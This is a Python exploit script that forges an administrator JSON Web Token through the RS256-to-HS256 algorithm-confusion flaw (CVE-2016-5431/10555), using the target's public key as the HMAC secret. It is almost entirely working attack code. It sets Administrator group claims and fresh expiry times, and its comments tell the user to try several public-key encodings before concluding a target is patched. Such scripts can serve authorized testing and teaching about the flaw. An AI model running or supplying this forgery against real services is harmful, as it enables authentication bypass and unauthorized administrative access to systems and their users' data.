Forge an HS256-signed JWT using the target's RS256 *public* key as the HMAC secret — the algorithm-confusion flaw tracked as CVE-2016-5431 / CVE-2016-10555. It only works against verifiers that trust the token's `alg` header instead of pinning the expected algorithm.
import base64
import hashlib
import hmac
import json
import time
import uuid
from codecs import encode, decode
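# https://github.com/FlorianPicca/JWT-Key-Recovery
#
# Algorithm-confusion attack (CVE-2016-5431 / CVE-2016-10555): a verifier that
# trusts the token's "alg" header and hands its RS256 *public* key to the HMAC
# routine will accept an HS256 token whose secret is that public key. The only
# "secret" the attacker needs is therefore the public key bytes.

HEADER = b'{"typ":"JWT","alg":"HS256"}'


def b64url(data: bytes) -> str:
    """Encode *data* as unpadded base64url text (RFC 7515 section 2).

    The JWS alphabet uses '-' and '_' and forbids padding and line breaks. The
    codecs 'base64' codec used previously emits '+', '/', '=' and a newline
    every 76 characters, so the earlier output stopped being a valid JWT as
    soon as the payload exceeded one base64 line.
    """
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def hs256_signature(key: bytes, signing_input: bytes) -> bytes:
    """Return the raw HMAC-SHA256 of *signing_input* keyed with *key*.

    *key* must be byte-for-byte what the target feeds to its HMAC. For this
    attack that is the public key in exactly the encoding the server loads
    (PEM text with or without the trailing newline, or DER). If the forged
    token is rejected, try those variants before concluding the target is
    patched.

    The digest is returned untouched: it is binary, so whitespace-stripping
    it (as the original did) silently corrupts any signature whose first or
    last byte happens to be an ASCII whitespace value.
    """
    return hmac.new(key, signing_input, hashlib.sha256).digest()


def forge_hs256_token(key: bytes, claims: dict) -> str:
    """Build an HS256 JWT over *claims* using *key* as the HMAC secret.

    Returns the compact serialization ``header.payload.signature``. Each
    segment is unpadded base64url, and the signature covers the exact ASCII
    bytes of ``header.payload`` as RFC 7515 requires.
    """
    # Compact JSON, matching the header: whitespace only bloats the token.
    payload = json.dumps(claims, separators=(",", ":")).encode("utf-8")
    signing_input = f"{b64url(HEADER)}.{b64url(payload)}"
    signature = hs256_signature(key, signing_input.encode("ascii"))
    return f"{signing_input}.{b64url(signature)}"


def main() -> None:
    """Read pub.pem, forge an Administrator token and print key and token."""
    with open("pub.pem", "rb") as fh:
        # Raw file bytes: this is the HMAC secret, see hs256_signature().
        key = fh.read()

    # Fresh timestamps: the original hard-coded an exp that has long passed,
    # so the token would be rejected as expired before the signature mattered.
    now = int(time.time())
    claims = {
        "iss": "YOUR_ISSUER",
        "user": "doctor.strange",
        "groups": ["Administrator"],
        "iat": now,
        "exp": now + 86400,  # one day, the same window the fixed values used
        "jti": str(uuid.uuid4()),
    }
    token = forge_hs256_token(key, claims)

    # Display only: undo JSON-style escaping so a key pasted from a JSON blob
    # prints readably. The *signing* key is still the raw file contents — if
    # pub.pem holds literal "\n" sequences, the HMAC secret will not match the
    # real PEM the server loaded; fix the file rather than this line.
    printable_key = key.decode("utf-8").replace("\\n", "\n").replace("\\t", "\t")
    print("Forged Token with public key: ")
    print(printable_key, end="\n\n")
    print(token)


if __name__ == "__main__":
    main()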